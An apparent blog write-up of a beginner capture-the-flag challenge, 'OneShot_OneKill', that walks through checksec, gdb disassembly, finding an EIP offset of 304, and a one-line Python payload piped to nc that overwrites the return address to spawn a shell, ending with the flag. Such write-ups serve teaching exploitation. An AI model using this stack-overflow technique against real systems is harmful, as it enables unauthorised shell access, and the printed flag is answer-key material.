Writeup for OneShot_OneKill
You have just one bullet…. kill him!
-> nc prob.vulnerable.kr 20026
-> binary
let’s have some fun with the vulnerable binaries…
step 1:
First things first: make the binary executable (chmod +x), then check which mitigations it was built with (checksec) before deciding on an approach.
As this is a basic pwn challenge, I would also like to talk about the mitigations…
From this, we know
-> It's a 32-bit ELF (Executable and Linkable Format).
-> It uses the little-endian byte order, so multi-byte values (like the return address) are stored least-significant byte first.
-> NX is enabled, so the stack is not executable (no placing shellcode on it), but we can still return into code that already exists in the binary.
-> No PIE, so the binary loads at a fixed base and the addresses of its functions stay the same on every run.
Let's see if we can simply overwrite the saved EIP (instruction pointer)…
step 2:
First, let's list the functions in the program!!
So let me fire up gdb, disassemble, and see what's going on in the oneshot function!!
It spawns "/bin/sh" for us, which is the shell we want (a library call in the binary, not a raw system call). Since the address is fixed (no PIE), we can simply return into that function.
step 3:
So let's find the offset to EIP in gdb peda!!
- "pattern_create 500 pat" (writes a 500-byte cyclic pattern to the file pat)
- then run the program with that file as input
- after the crash, find the offset with "pattern_search" (it looks up the bytes that landed in EIP)
So we find that the saved EIP sits at offset 304…
step 4:
Finally, we write our exploit
- We also found the address of the oneshot function: 0x080485a5
- It's little-endian, remember, so the bytes must be sent reversed: '\x08\x04\x85\xa5'[::-1] in Python gives '\xa5\x85\x04\x08'
so the script !!
python -c "print 'a'*304 + '\x08\x04\x85\xa5'[::-1]" | nc prob.vulnerable.kr 20026
(This is Python 2 syntax; the first 304 bytes fill the buffer up to the saved return address and the last 4 replace it with the address of oneshot.) If the shell closes before you can type into it, that is because nc sees EOF once python exits; keeping stdin open with a trailing cat in the same pipeline fixes that.
And you get the flag
FLAG: KorNewbie{Nice_Sh0T_N3wbie_Pwner!$#}
Thanks for reading, guys!
Originally published at http://tourpran.wordpress.com on November 6, 2019.